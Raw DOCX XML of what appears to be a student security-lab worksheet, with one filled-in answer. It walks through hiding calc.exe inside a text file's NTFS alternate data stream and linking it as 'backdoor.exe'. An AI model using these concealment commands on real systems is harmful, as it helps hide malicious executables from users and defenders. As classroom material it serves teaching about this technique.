                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>created in C:\Main</w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00214241">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="234" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternatively, you could write your own exe application and paste it in the folder. To create .exe application or any </w:t>
      </w:r>
      <w:r w:rsidR="00214241">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, use any development platform. (.Net, Java, Python Scripts…) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="43" w:line="234" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Try them and record them in your coursework and/or in the shared </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Onenote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with instructions to gain CREDITS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="58" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open the command prompt and set your created folder path (C:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fdr_Hide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a txt file (Either using the command prompt or go to the folder to create one) and add few lines of text and save the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="89" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the size of all the files in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fdr_Hide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="247" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Record your EVIDENCE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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="003D3CCD">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F60B97" wp14:editId="56869D3A">
                  <wp:extent cx="4876800" cy="3524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4876800" cy="352425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, hide the exe file into the txt file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="83" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="1004" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Type c:\Fdr_Hide\calc.exe &gt; c:\Fdr_Hide\txtfilename.txt:calc.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now check the file sizes </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="7200" w:type="dxa"/>
        <w:tblInd w:w="1440" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="247" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Is there any difference in the file size?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tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRPr="000B74D0" w:rsidRDefault="000B74D0">
            <w:r w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>There are no differences in the file size. They appear to be the same when checking.</w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="000B74D0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="336" w:lineRule="auto"/>
        <w:ind w:right="1004" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mklink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor.exe txtfilename.txt:calc.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Record your </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflection (What happens with the backdoor.exe)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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>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p>
        </w:tc>
      </w:tr>
